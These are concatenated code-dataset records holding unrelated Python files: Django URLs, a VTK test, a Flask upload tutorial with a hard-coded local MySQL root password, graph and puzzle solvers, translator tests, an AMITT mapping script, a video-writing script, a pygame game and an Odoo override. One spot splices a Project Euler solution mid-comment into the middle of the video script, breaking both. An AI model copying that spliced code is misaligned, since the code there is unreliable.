views.remove_friend, name='remove_friend'),\n]\n\nuser_patterns = [\n    url(r'^$', views.users, name='users'),\n]\n\nzahtevi_patterns = [\n    url(r'^$', views.zahtevi, name='zahtevi'),\n    url(r'(?P\\d+)/prihvati/', views.accept_request, name='accept_request'),\n    url(r'zahtevi/(?P\\d+)/odbij/', views.decline_request, name='decline_request'),\n]\n\nurlpatterns = [\n    url(r'^$', views.home, name='home'),\n    url(r'^bioskopi/', include(bioskopi_patterns)),\n    url(r'^pozorista/', include(pozorista_patterns)),\n    url(r'^rezervacije/filmovi/', include(rezervacije_filmova_patterns)),\n    url(r'^rezervacije/predstave/', include(rezervacije_predstava_patterns)),\n    url(r'^profil/', include(profile_patterns)),\n    url(r'^prijatelji/', include(friend_patterns)),\n    url(r'^korisnici/', include(user_patterns)),\n    url(r'^zahtevi/', include(zahtevi_patterns)),\n\n    url(r'registracija/$', views.registration_view, name='registration'),\n    url(r'^registracija/(?P[0-9A-Za-z_\\-]+)/(?P[0-9A-Za-z]{1,13}-[0-9A-Za-z]{1,20})/$', views.activate, name='activate'),\n    url(r'prijava/$', views.login_view, name='login'),\n    url(r'odjava/$', views.logout_view, name='logout'),\n    url(r'pretrazi/$', views.search_users, name='search_users'),\n]\n","sub_path":"projekat/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":5497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
{"seq_id":"56032330","text":"class Node: # the Node class holds a data field and a link field\n\n    def __init__(self, data):\n        self.data = data # data field\n        self.next = None # link field\n    \n    def __repr__(self):\n        return str(self.data)\n\nclass LinkedList:\n\n    def __init__(self):\n        self.head = None # the initial head of the linked list is None (head)\n        self.count = 0\n\nllist = LinkedList()\nfirst = Node(1)\nllist.head = first \nsecond = Node(2)\nthird = Node(3)\n\nfirst.next = second\nsecond.next = third\n\nwhile llist.head:\n    print(llist.head.data)\n    llist.head = llist.head.next","sub_path":"python/swea/intermediate/testlinkedlist.py","file_name":"testlinkedlist.py","file_ext":"py","file_size_in_byte":621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
{"seq_id":"35672501","text":"#!/usr/bin/env python\nfrom vtkmodules.vtkCommonDataModel import vtkDataObject\nfrom vtkmodules.vtkCommonMath import vtkRungeKutta4\nfrom vtkmodules.vtkCommonSystem import vtkTimerLog\nfrom vtkmodules.vtkFiltersCore import vtkStructuredGridOutlineFilter\nfrom vtkmodules.vtkFiltersFlowPaths import vtkStreamTracer\nfrom vtkmodules.vtkFiltersModeling import vtkRibbonFilter\nfrom vtkmodules.vtkFiltersSources import vtkPlaneSource\nfrom vtkmodules.vtkIOParallel import vtkMultiBlockPLOT3DReader\nfrom vtkmodules.vtkRenderingCore import (\n    vtkActor,\n    vtkPolyDataMapper,\n    vtkRenderWindow,\n    vtkRenderWindowInteractor,\n    vtkRenderer,\n)\nimport vtkmodules.vtkInteractionStyle\nimport vtkmodules.vtkRenderingFreeType\nimport vtkmodules.vtkRenderingOpenGL2\nfrom vtkmodules.util.misc import vtkGetDataRoot\nVTK_DATA_ROOT = vtkGetDataRoot()\n\n# Control test size\nres = 2\n\n# Create the RenderWindow, Renderer and both Actors\n#\nren1 = vtkRenderer()\nrenWin = vtkRenderWindow()\nrenWin.AddRenderer(ren1)\niren = vtkRenderWindowInteractor()\niren.SetRenderWindow(renWin)\n\n# create pipeline\n#\npl3d = vtkMultiBlockPLOT3DReader()\npl3d.SetXYZFileName(VTK_DATA_ROOT + \"/Data/combxyz.bin\")\npl3d.SetQFileName(VTK_DATA_ROOT + \"/Data/combq.bin\")\npl3d.SetScalarFunctionNumber(100)\npl3d.SetVectorFunctionNumber(202)\npl3d.Update()\n
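# Added note: the PLOT3D reader yields a multi-block dataset; block 0 is the\n# structured grid that feeds the rest of the pipeline.\noutput = 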
pl3d.GetOutput().GetBlock(0)\n\n# Create a rake of streamlines\nps = vtkPlaneSource()\nps.SetXResolution(res)\nps.SetYResolution(res)\nps.SetOrigin(2,-2,26)\nps.SetPoint1(2,2,26)\nps.SetPoint2(2,-2,32)\nps.Update()\n\npsMapper = vtkPolyDataMapper()\npsMapper.SetInputConnection(ps.GetOutputPort())\n\npsActor = vtkActor()\npsActor.SetMapper(psMapper)\npsActor.GetProperty().SetRepresentationToWireframe()\n\nrk4 = vtkRungeKutta4()\nstreamer = vtkStreamTracer()\nstreamer.SetInputData(output)\nstreamer.SetSourceData(ps.GetOutput())\nstreamer.SetMaximumPropagation(100)\nstreamer.SetInitialIntegrationStep(.2)\nstreamer.SetIntegrationDirectionToForward()\nstreamer.SetComputeVorticity(1)\nstreamer.SetIntegrator(rk4)\n\nnumStreamers = ps.GetOutput().GetNumberOfPoints()\ntimer = vtkTimerLog()\ntimer.StartTimer()\nstreamer.Update()\ntimer.StopTimer()\ntime = timer.GetElapsedTime()\nprint(\"Time to generate: {0} streamers\".format(numStreamers), \": {0}\".format(time))\n\nrf = vtkRibbonFilter()\nrf.SetInputConnection(streamer.GetOutputPort())\nrf.SetInputArrayToProcess(1, 0, 0, vtkDataObject.FIELD_ASSOCIATION_POINTS, \"Normals\")\nrf.SetWidth(0.1)\nrf.SetWidthFactor(5)\n\nstreamMapper = vtkPolyDataMapper()\nstreamMapper.SetInputConnection(rf.GetOutputPort())\nstreamMapper.SetScalarRange(output.GetScalarRange())\nstreamline = vtkActor()\nstreamline.SetMapper(streamMapper)\n\nprint(\"Output scalar range:\",output.GetScalarRange())\n\noutline = vtkStructuredGridOutlineFilter()\noutline.SetInputData(output)\n\noutlineMapper = vtkPolyDataMapper()\noutlineMapper.SetInputConnection(outline.GetOutputPort())\n\noutlineActor = vtkActor()\noutlineActor.SetMapper(outlineMapper)\n# Add the actors to the renderer, set the background and size\n#\nren1.AddActor(psActor)\nren1.AddActor(outlineActor)\nren1.AddActor(streamline)\nren1.SetBackground(1,1,1)\nrenWin.SetSize(300,300)\nren1.SetBackground(0.1,0.2,0.4)\ncam1 = ren1.GetActiveCamera()\ncam1.SetClippingRange(3.95297,50)\ncam1.SetFocalPoint(9.71821,0.458166,29.3999)\ncam1.SetPosition(2.7439,-37.3196,38.7167)\ncam1.SetViewUp(-0.16123,0.264271,0.950876)\n# render the image\n#\nrenWin.Render()\nthreshold = 15\niren.Start()\n# --- end of script --\n","sub_path":"Filters/FlowPaths/Testing/Python/TestThreadedStreamTracer.py","file_name":"TestThreadedStreamTracer.py","file_ext":"py","file_size_in_byte":3431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
{"seq_id":"399388407","text":"from flask import Flask,render_template,request,make_response,redirect\nimport datetime\nimport os\nfrom flask_sqlalchemy import SQLAlchemy\n\napp=Flask(__name__)\n\n# configure the database for the app: a connection string describing the MySQL database\napp.config['SQLALCHEMY_DATABASE_URI']='mysql://root:123456@localhost:3306/flask'\n# create the SQLAlchemy instance and bind the app to it\n# db is the SQLAlchemy instance and represents the database in use;\n# it also exposes all of SQLAlchemy's functionality\ndb=SQLAlchemy(app)\n\n\n@app.route('/01-js')\ndef js_views():\n    return render_template('01-js.html')\n\n@app.route('/02-get')\ndef get_views():\n    name=request.args['name']\n    print(type(name))\n    age = request.args['age']\n    return 'name: {}, age: {}'.format(name,age)\n\n@app.route('/03-response')\ndef response_views():\n    # resp = make_response('content created via a response object')\n    resp=make_response(render_template('01-js.html'))\n    return resp\n\n@app.route('/04-redirect')\ndef redirect_views():\n    # hand off to 03-response via a redirect\n    # contrast with url_for:\n    # url = url_for('response_views'), then jump via a hyperlink\n    return redirect('/03-response')\n\n@app.route('/05-file',methods=['GET','POST'])\ndef file_views():\n
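    # Illustrative note (added): with the timestamp naming below, a file\n    # 'photo.png' uploaded at 2020-01-02 03:04:05.678901 is saved as\n    # '20200102030405678901.png'.\n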
    if request.method == 'GET':\n        return render_template('05-file.html')\n    else:\n        # get the uploaded file\n        f = request.files['uimg']\n        # save the uploaded file to the target directory: first get the uploaded\n        # file name, rename it to the current timestamp, then save\n\n        # get the current time, down to microseconds\n        ftime = datetime.datetime.now().strftime('%Y%m%d%H%M%S%f')\n\n        # get the file extension (use the last segment so names containing dots still work)\n        # filename = f.filename\n\n        ext = f.filename.split('.')[-1]\n\n        filename = ftime+'.'+ext\n\n        print(filename)\n        # f.save('static/updata/' + filename)\n\n        # save the uploaded file under an absolute path\n        # dirname strips the file name and returns a directory; __file__ is this file's path\n        basedir = os.path.dirname(__file__)\n        print('current file path: {}'.format(__file__))\n        print(basedir)\n        upload_path=os.path.join(basedir,'static/updata',filename)\n        print(upload_path)\n        f.save(upload_path)\n\n        return 'Upload OK'\n\n\n\n\n\n\n\n\n\n\n\nif __name__ == '__main__':\n    app.run(debug = True,port='8000')","sub_path":"python flask/day4/Flask04.py","file_name":"Flask04.py","file_ext":"py","file_size_in_byte":2426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
{"seq_id":"395062464","text":"import re\nimport itertools\n\nclass Graph:\n\n\tdef __init__(self, filename):\n\t\tself.nodes = set() #represent a set of all nodes of the graph\n\t\tself.edges = [] #represent each edge of nodes in the graph using a list of tuples eg. 'a' - 'b' [('a','b')]\n\t\tself.adjacencyMatrix = []\n\t\tself.mapNodes = {} #dictionary that maps each character to an int in the range 0 to len(self.nodes) - 1\n\t\tself.subNodes = set()\n\n\t\t#----PARSING THE DOT FILE-----\n\t\tlines = [line.rstrip() for line in open(filename)][1:] #load each line of the document into each element of the list lines starting from the 2nd line\n\t\t\n\t\tfor line in lines:\n\t\t\tmatch = re.search(r'\\s*(\\w+)\\s*--\\s*(\\w+);.*', line) #try match the line with the pattern of 2 nodes\n\t\t\tif match:\n\t\t\t\tself.nodes.add(match.group(1))\n\t\t\t\tself.nodes.add(match.group(2))\n\t\t\t\tself.edges.append((match.group(1),match.group(2)))\n\n\t\t\tmatch = re.search(r'\\s*(\\w+)\\s*;.*', line) #try match line with pattern of 1 node\n\t\t\tif match:\n\t\t\t\tself.nodes.add(match.group(1))\n\t\t\t\tself.edges.append((match.group(1),))\n\n\t\t\n\t\tself.nodes = list(self.nodes)\t\t\n\n\t\t\n\t\t#create a zeros matrix len(nodes)xlen(nodes)\n\t\tself.adjacencyMatrix = [[0 for i in range(len(self.nodes))] for j in range(len(self.nodes))]\n\n\t\tfor i in range(len(self.nodes)): #map each char to a int in the range [0,len(nodes)[\n\t\t\tself.mapNodes[self.nodes[i]] = i\n\n\t\t#building the adjacency matrix using the mapNodes to know which row,column to fill the discrete value 0 | 1\n\t\tfor edge in self.edges:\n\t\t\tif len(edge) == 2:\n\t\t\t\tself.adjacencyMatrix[self.mapNodes[edge[0]]][self.mapNodes[edge[1]]] = 1\n\t\t\t\tself.adjacencyMatrix[self.mapNodes[edge[1]]][self.mapNodes[edge[0]]] = 1\n\n\tdef allsubgraphs(self): #return all combinations of subgraphs in a list of combinations objects\n\t\tsubgraphs = []\n\t\tfor i in range(len(self.nodes)):\n\t\t\tsubgraphs.append(itertools.combinations(range(len(self.nodes)),i+1))\n\t\treturn subgraphs\n\n\tdef isclique(self, subgraph): #given a tuple that represents a subgraph, return True if it is a clique, otherwise False\n\t\tif len(subgraph) == 1: #every single-node subgraph is a clique\n\t\t\treturn True\n\t\t\n\t\t# every pair of vertices must be connected; return True only after all pairs pass\n\t\tfor i in range(len(subgraph)):\n\t\t\tfor j in range(i+1, len(subgraph)):\n\t\t\t\tif self.adjacencyMatrix[subgraph[i]][subgraph[j]] == 0:\n\t\t\t\t\treturn False\n\t\treturn True\n\n\ndef maximum_clique(g):\n\tlen_cliques = [] \n
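\t# Added note: this is brute force - it enumerates all 2^n - 1 non-empty vertex\n\t# subsets and records every clique's size, so it is practical only for very small graphs.\n\tsubgraphs = 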
g.allsubgraphs()\n\tfor graph in subgraphs:\n\t\tfor combination in graph:\n\t\t\tif g.isclique(combination):\n\t\t\t\tlen_cliques.append(len(combination))\n\n\treturn max(len_cliques)","sub_path":"maximum_clique/p1v3.py","file_name":"p1v3.py","file_ext":"py","file_size_in_byte":2506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"623985797","text":"import os\nimport json\nfrom datetime import date\nimport xml.etree.ElementTree as ET\nimport subprocess as sp\nimport ast\nimport pytest\n\nfrom delphi.translators.for2py import (\n preprocessor,\n translate,\n get_comments,\n pyTranslate,\n genPGM,\n mod_index_generator,\n)\n\nfrom pathlib import Path\nfrom typing import Dict, Tuple\n\n\nDATA_DIR = \"tests/data/program_analysis\"\n\ndef get_python_source(original_fortran_file) -> Tuple[str, str, str, str, Dict]:\n stem = original_fortran_file.stem\n preprocessed_fortran_file = stem + \"_preprocessed.f\"\n lambdas_filename = stem + \"_lambdas.py\"\n json_filename = stem + \".json\"\n python_filename = stem + \".py\"\n\n with open(original_fortran_file, \"r\") as f:\n inputLines = f.readlines()\n\n with open(preprocessed_fortran_file, \"w\") as f:\n f.write(preprocessor.process(inputLines))\n\n xml_string = sp.run(\n [\n \"java\",\n \"fortran.ofp.FrontEnd\",\n \"--class\",\n \"fortran.ofp.XMLPrinter\",\n \"--verbosity\",\n \"0\",\n preprocessed_fortran_file,\n ],\n stdout=sp.PIPE,\n ).stdout\n\n trees = [ET.fromstring(xml_string)]\n comments = get_comments.get_comments(preprocessed_fortran_file)\n os.remove(preprocessed_fortran_file)\n xml_to_json_translator = translate.XMLToJSONTranslator()\n mode_mapper_tree = ET.fromstring(xml_string)\n generator = mod_index_generator.moduleGenerator()\n mode_mapper_dict = generator.analyze(mode_mapper_tree)\n outputDict = xml_to_json_translator.analyze(trees, comments)\n pySrc = pyTranslate.create_python_source_list(outputDict)[0][0]\n return pySrc, lambdas_filename, json_filename, python_filename, mode_mapper_dict\n\n\ndef make_grfn_dict(original_fortran_file) -> Dict:\n pySrc, lambdas_filename, json_filename, python_filename, mode_mapper_dict = get_python_source(original_fortran_file)\n asts = [ast.parse(pySrc)]\n _dict = genPGM.create_pgm_dict(lambdas_filename, asts, python_filename, mode_mapper_dict, save_file=False)\n for identifier in _dict[\"identifiers\"]:\n del identifier[\"gensyms\"]\n\n os.remove(lambdas_filename)\n return _dict\n\n\ndef postprocess_test_data_grfn_dict(_dict):\n \"\"\" Postprocess the test data grfn dict to change the date to the date of\n execution, and also remove the randomly generated gensyms \"\"\"\n _dict[\"dateCreated\"] = \"\".join(str(date.today()).split(\"-\"))\n for identifier in _dict[\"identifiers\"]:\n if \"gensyms\" in identifier:\n del identifier[\"gensyms\"]\n\n@pytest.fixture\ndef crop_yield_grfn_dict():\n _dict = make_grfn_dict(Path(f\"{DATA_DIR}/crop_yield.f\"))\n yield(_dict)\n\n\n@pytest.fixture\ndef petpt_grfn_dict():\n _dict = make_grfn_dict(Path(f\"{DATA_DIR}/PETPT.for\"))\n yield(_dict)\n\n\n@pytest.fixture\ndef io_grfn_dict():\n _dict = make_grfn_dict(Path(f\"{DATA_DIR}/io-tests/iotest_05.for\"))\n yield(_dict)\n\n\n@pytest.fixture\ndef array_python_IR_test():\n yield get_python_source(Path(f\"{DATA_DIR}/arrays/arrays-basic-06.f\"))[0]\n\n\n@pytest.fixture\ndef derived_types_python_IR_test():\n yield get_python_source(\n Path(f\"{DATA_DIR}/derived-types/derived-types-03.f\")\n )[0]\n\n\ndef test_crop_yield_grfn_generation(crop_yield_grfn_dict):\n 
with open(f\"{DATA_DIR}/crop_yield.json\", \"r\") as f:\n json_dict = json.load(f)\n postprocess_test_data_grfn_dict(json_dict)\n\n assert crop_yield_grfn_dict == json_dict\n\n\ndef test_petpt_grfn_generation(petpt_grfn_dict):\n with open(f\"{DATA_DIR}/PETPT.json\", \"r\") as f:\n json_dict = json.load(f)\n postprocess_test_data_grfn_dict(json_dict)\n assert petpt_grfn_dict == json_dict\n\n\ndef test_io_grfn_generation(io_grfn_dict):\n with open(f\"{DATA_DIR}/io-tests/iotest_05.json\", \"r\") as f:\n json_dict = json.load(f)\n postprocess_test_data_grfn_dict(json_dict)\n assert io_grfn_dict == json_dict\n\n\ndef test_array_pythonIR_generation(array_python_IR_test):\n with open(f\"{DATA_DIR}/arrays-basic-06.py\", \"r\") as f:\n python_src = f.read()\n assert array_python_IR_test == python_src\n\n\ndef test_derived_type_pythonIR_generation(derived_types_python_IR_test):\n with open(f\"{DATA_DIR}/derived-types-03.py\", \"r\") as f:\n python_dict = f.read()\n assert derived_types_python_IR_test == python_dict\n","sub_path":"tests/test_program_analysis.py","file_name":"test_program_analysis.py","file_ext":"py","file_size_in_byte":4309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"142062418","text":"#!/usr/bin/env python3\n\nimport json, requests\n\namitt_tactic_mapping = {}\namitt_technique_mapping = {}\namitt_mitigation_mapping = {}\n\namitt_json_url = (\"https://raw.githubusercontent.com/cogsec-collaborative/amitt_cti/master/amitt/amitt-attack.json\")\n\namitt_json = requests.get(amitt_json_url).json()\n\nfor object in amitt_json[\"objects\"]:\n if object['type'] == \"course-of-action\" and \"M\" in \\\n object['external_references'][0]['external_id']:\n mitigation_id = object['external_references'][0]['external_id']\n mitigation_name = object['name']\n amitt_mitigation_mapping.update({ mitigation_id: mitigation_name })\n elif object['type'] == \"attack-pattern\":\n technique_id = object['external_references'][0]['external_id']\n technique_name = object['name']\n amitt_technique_mapping.update({ technique_id: technique_name })\n elif object['type'] == \"x-mitre-matrix\":\n tactics_matrix = object['tactic_refs']\n for each_object in amitt_json[\"objects\"]:\n if each_object['id'] in tactics_matrix:\n tactic_id = each_object['external_references'][0]['external_id']\n tactic_name = each_object['name']\n tactic_tag = \"amitt.\" + each_object['name'].lower().replace(\" \", \"_\")\n amitt_tactic_mapping[tactic_tag] = [tactic_name, tactic_id]\n\n\nwith open('amitt_mapping.py', 'w') as fp:\n fp.write(\"amitt_tactic_mapping = \" + json.dumps(amitt_tactic_mapping,indent=4) + '\\n')\n fp.write(\"amitt_technique_mapping = \" + json.dumps(amitt_technique_mapping,indent=4) + '\\n')\n fp.write(\"amitt_mitigation_mapping = \" + json.dumps(amitt_mitigation_mapping,indent=4))\n","sub_path":"scripts/update_amitt_mapping.py","file_name":"update_amitt_mapping.py","file_ext":"py","file_size_in_byte":1611,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"51847708","text":"class Solution:\n # @param s, a string\n # @return a list of lists of string\n def partition(self, s):\n if len(s) == 0:\n return []\n if len(s) == 1:\n return [[s]]\n result = []\n if self.isPalindrome(s):\n result.append([s])\n for i in range(1, len(s)):\n head = s[:i]\n if not self.isPalindrome(head):\n continue\n tailPartion = self.partition(s[i:])\n result.extend([[head] + item for item in tailPartion])\n return result\n\n def 
isPalindrome(self, s):\n begin, end = 0, len(s) - 1\n while begin < end:\n if s[begin] != s[end]:\n return False\n else:\n begin += 1\n end -= 1\n return True\n","sub_path":"palindrome_partitioning.py","file_name":"palindrome_partitioning.py","file_ext":"py","file_size_in_byte":802,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"44702907","text":"import math\r\nfrom tqdm import tqdm\r\n\r\ndef build_prime_list(bound):\r\n ns = [1]*(bound+1)\r\n primes = []\r\n for n in range(2,bound+1):\r\n if ns[n] == 1:\r\n primes.append(n)\r\n for k in range(n**2,bound+1,n):\r\n ns[k] = 0\r\n return primes\r\n\r\ndef factorial_valuation(n,p):\r\n # returns the valuation of n! at the prime p.\r\n total = 0\r\n while n:\r\n total += n//p\r\n n = n//p\r\n return total\r\n\r\ndef factor_factorial(n):\r\n primes = build_prime_list(n)\r\n factorization = {p:factorial_valuation(n,p) for p in primes}\r\n return factorization\r\n\r\n#print(factor_factorial(70))\r\ndef problem646(n,lb,ub):\r\n factored = factor_factorial(n)\r\n d1,d2 = [1],[1]\r\n for p in factored:\r\n if len(d1) > len(d2):\r\n new_d = []\r\n for e in range(1,factored[p]+1):\r\n new_d += [x*(-p)**e for x in d2]\r\n d2 += new_d\r\n else:\r\n new_d = []\r\n for e in range(1,factored[p]+1):\r\n new_d += [x*(-p)**e for x in d1]\r\n d1 += new_d\r\n d1.sort(key=abs)\r\n d2.sort(key=abs)\r\n\r\n total = 0\r\n # Strategy: fix D from d1.\r\n # Keep track of the min index i0 so that |d2[i]*D| < lb for all i 0 and width > 0:\n save_fname = '{}_{}x{}'.format(save_fname, width, height)\n\n if out_postfix:\n save_fname = '{}_{}'.format(save_fname, out_postfix)\n\n if reverse:\n save_fname = '{}_r{}'.format(save_fname, reverse)\n\n save_path = os.path.join(os.path.dirname(src_path), '{}.{}'.format(save_fname, ext))\n\n if src_root_dir and save_root_dir:\n save_path = save_path.replace(src_root_dir, save_root_dir)\n print('save_path: {}'.format(save_path))\n print('src_root_dir: {}'.format(src_root_dir))\n print('save_root_dir: {}'.format(save_root_dir))\n print('save_path: {}'.format(save_path))\n # sys.exit()\n\n if os.path.exists(save_path):\n dst_mtime = os.path.getmtime(save_path)\n src_mtime = os.path.getmtime(src_path)\n\n dst_mtime_fmt = datetime.fromtimestamp(dst_mtime).strftime('%Y-%m-%d %H:%M:%S')\n src_mtime_fmt = datetime.fromtimestamp(src_mtime).strftime('%Y-%m-%d %H:%M:%S')\n\n print('Output video file already exists: {}'.format(save_path))\n\n if dst_mtime >= src_mtime:\n print('Last modified time: {} is not older than the source: {} so skipping it'.format(\n dst_mtime_fmt, src_mtime_fmt\n ))\n save_path = ''\n continue\n else:\n print('Last modified time: {} is older than the source: {} so overwriting it'.format(\n dst_mtime_fmt, src_mtime_fmt\n ))\n\n save_dir = os.path.dirname(save_path)\n if save_dir and not os.path.isdir(save_dir):\n os.makedirs(save_dir)\n\n if height <= 0 or width <= 0:\n temp_img = cv2.imread(os.path.join(src_path, src_files[0]))\n height, width, _ = temp_img.shape\n\n if codec == 'H265':\n video_out = VideoWriterGPU(save_path, fps, (width, height))\n else:\n fourcc = cv2.VideoWriter_fourcc(*codec)\n video_out = cv2.VideoWriter(save_path, fourcc, fps, (width, height))\n\n if video_out is None:\n raise IOError('Output video file could not be opened: {}'.format(save_path))\n\n print('Saving {}x{} output video to {}'.format(width, height, save_path))\n\n frame_id = start_id\n pause_after_frame = 0\n print_diff = max(1, int(n_src_files / 100))\n start_t = time.time()\n 
while True:\n filename = src_files[frame_id]\n file_path = os.path.join(src_path, filename)\n if not os.path.exists(file_path):\n raise SystemError('Image file {} does not exist'.format(file_path))\n\n image = cv2.imread(file_path)\n\n image = resizeAR(image, width, height)\n\n if show_img:\n cv2.imshow(seq_name, image)\n k = cv2.waitKey(1 - pause_after_frame) & 0xFF\n if k == 27:\n exit_prog = 1\n break\n elif k == ord('q'):\n break\n elif k == 32:\n pause_after_frame = 1 - pause_after_frame\n\n video_out.write(image)\n\n frame_id += 1\n\n if frame_id % print_diff == 0:\n end_t = time.time()\n fps = float(print_diff) / (end_t - start_t)\n sys.stdout.write('\\rDone {:d}/{:d} frames at {:.4f} fps'.format(\n frame_id - start_id, n_src_files - start_id, fps))\n sys.stdout.flush()\n start_t = end_t\n\n if n_frames > 0 and (frame_id - start_id) >= n_frames:\n break\n\n if frame_id >= n_src_files:\n break\n\n sys.stdout.write('\\n\\n')\n sys.stdout.flush()\n\n video_out.release()\n\n if show_img:\n cv2.destroyWindow(seq_name)\n\n if del_src:\n print('Removing source folder {}'.format(src_path))\n shutil.rmtree(src_path)\n\n save_path = ''\n\n if exit_prog:\n break\n","sub_path":"imgSeqToVideo.py","file_name":"imgSeqToVideo.py","file_ext":"py","file_size_in_byte":7136,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"273553407","text":"import pygame\r\nfrom pygame.locals import *\r\nimport time\r\npygame.init()\r\nimport random\r\nscreen = pygame.display.set_mode((500,500))\r\nimport os\r\nimport sys\r\nimport threading\r\nfile = 'D:/sample_game.py'\r\nred = (255,0,0)\r\ngame_over = False\r\nplayer_speed = 40\r\nx = 210\r\ny = 400\r\nfps = 60\r\nenemy_speed = 5\r\nspace_shuttle = pygame.image.load('D:/DOCUMENTS/Downloads/transport.png')\r\nmyfont = pygame.font.SysFont('Comic Sans MS',50)\r\nnewfont = pygame.font.SysFont('bahaus 93',30)\r\nplayer_sprite = pygame.image.load('D:/DOCUMENTS/Downloads/space-shuttle.png')\r\n#five enemies\r\nx1 = random.randint(0,500)\r\ne_y = 0\r\ne2_y = 0\r\ne3_y = 0\r\ne4_y = 0\r\ne5_y = 0\r\nx2 = random.randint(0,500-5)\r\nx3 = random.randint(0,500-5)\r\nx4 = random.randint(0,500-5)\r\nx5 = random.randint(0,500-5)\r\n\r\ncolor = (163,144,106)\r\nsize = 100\r\n\r\n\r\nscreen.fill((255,255,255))\r\ntextsurface = myfont.render('Space Dodgers',False,(0,255,0))\r\ninstruct_text = newfont.render('Press space to start',False,(255,50,20))\r\nscreen.blit(instruct_text,(150,200))\r\nscreen.blit(textsurface,(100,130))\r\nscreen.blit(space_shuttle,(100,250))\r\n \r\npygame.display.flip()\r\n\r\nclock = pygame.time.Clock()\r\n\r\n\r\ndef increase_difficulty():\r\n global enemy_speed\r\n while True:\r\n time.sleep(10)\r\n enemy_speed += 2\r\n\r\n\r\ndef restart(sc,enemy_y,player_x):\r\n print(sc)\r\n retry = input('GAME OVER DO YOU WANT TO RETRY[YES,NO]')\r\n if retry == 'Yes':\r\n enemy_y = 0\r\n player_x = 210\r\n sc = 0\r\n game_loop()\r\n sys.exit\r\n \r\ndef game_loop():\r\n start_incrdiff = threading.Thread(target=increase_difficulty)\r\n start_incrdiff.start()\r\n global x1\r\n global y\r\n global e_y\r\n global e2_y\r\n global e3_y\r\n global e4_y\r\n global e5_y\r\n global color\r\n global size\r\n \r\n global x\r\n global x2\r\n global x3\r\n global x4\r\n global x5\r\n\r\n score = 0\r\n game_f = True \r\n \r\n while game_f:\r\n e_y += enemy_speed\r\n current_score = 'Score:' + str(score)\r\n score_text = newfont.render(current_score,False,(136,85,95))\r\n \r\n for event in pygame.event.get():\r\n if event.type == 
QUIT:\r\n                pygame.quit()\r\n            if event.type == KEYDOWN:\r\n                if event.key == K_LEFT:\r\n                    x -= player_speed\r\n                if event.key == K_RIGHT:\r\n                    x += player_speed\r\n        if x >= 500-59 or x < 0:\r\n            print(score)\r\n            retry=input('GAME OVER DO YOU WANT TO RETRY[Yes,No]')\r\n            if retry == 'No':\r\n                sys.exit()\r\n            if retry == 'Yes':\r\n                x = 210\r\n                e_y = 0\r\n                score = 0\r\n                game_loop()\r\n        # the five enemy blocks share the same vertical position e_y, so one\r\n        # overlap test covers them all (collapsed from five identical branches)\r\n        for ex in (x1, x2, x3, x4, x5):\r\n            if (x > ex and x < ex+50 and y > e_y and y < e_y+50) or (ex > x and ex < x+50 and e_y > y and e_y < y+50):\r\n                print(score)\r\n                retry = input('GAME OVER DO YOU WANT TO RETRY[Yes,No]')\r\n                if retry == 'No':\r\n                    sys.exit()\r\n                if retry == 'Yes':\r\n                    x = 210\r\n                    e_y = 0\r\n                    score = 0\r\n                    game_loop()\r\n        \r\n        if e_y > y:\r\n            score+=1\r\n        \r\n        \r\n        clock.tick(fps)\r\n        screen.fill((255,255,255))\r\n        pygame.draw.rect(screen,color,(x1,e_y,50,50))\r\n        pygame.draw.rect(screen,color,(x2,e_y,50,50))\r\n        pygame.draw.rect(screen,color,(x3,e_y,50,50))\r\n        pygame.draw.rect(screen,color,(x4,e_y,50,50))\r\n        pygame.draw.rect(screen,color,(x5,e_y,50,50))\r\n        if e_y >= 500:\r\n            e_y = 0\r\n            x1 = random.randint(0,500)\r\n            x2 = random.randint(0,500-5)\r\n            x3 = random.randint(0,500-5)\r\n            x4 = random.randint(0,500-5)\r\n            x5 = random.randint(0,500-5)\r\n        screen.blit(score_text,(350,2))\r\n        pygame.draw.rect(screen,(255,0,00),(x,y,50,50))\r\n        pygame.display.flip()\r\n        pygame.display.update()\r\n        \r\nwhile True:\r\n    for event in pygame.event.get():\r\n        if event.type == KEYDOWN:\r\n            if event.key == K_SPACE:\r\n                print(event.key)\r\n                \r\n                \r\n                game_loop()\r\n                pygame.display.flip()\r\n    \r\n    \r\n    \r\n    \r\n\r\n\r\n\r\n\r\n\r\n    \r\n","sub_path":"Space Dodgers.py","file_name":"Space Dodgers.py","file_ext":"py","file_size_in_byte":5943,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
{"seq_id":"303642171","text":"# -*- coding: utf-8 -*-\n##############################################################################\n#\n#    OpenERP, Open Source Management Solution, third party addon\n#    Copyright (C) 2004-2016 Vertel AB ().\n#\n#    This program is free software: you can redistribute it and/or modify\n#    it under the terms of the GNU Affero General Public License as\n#    published by the Free Software Foundation, either version 3 of the\n#    License, or (at your option) any later version.\n#\n#    This program is distributed in the hope that it will be useful,\n#    but WITHOUT ANY WARRANTY; without even the implied warranty of\n#    MERCHANTABILITY 
or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU Affero General Public License for more details.\n#\n# You should have received a copy of the GNU Affero General Public License\n# along with this program. If not, see <http://www.gnu.org/licenses/>.\n#\n##############################################################################\nimport openerp.exceptions\nfrom openerp import models, fields, api, _\nimport datetime\nfrom datetime import timedelta\nimport csv\nimport os\nimport tempfile\nimport base64\nfrom openerp.tools.safe_eval import safe_eval as eval\n\ntry:\n    import odoorpc\nexcept:\n    pass\n\nimport logging\n_logger = logging.getLogger(__name__)\n\n\n\nclass hr_attendance(models.Model):\n    _inherit = 'hr.attendance'\n    \n    @api.multi\n    def _validate_fields(self, field_names):\n        return True\n    \n\nclass HrHolidays(models.Model):\n    _inherit = 'hr.holidays'\n    \n    @api.multi\n    def _validate_fields(self, field_names):\n        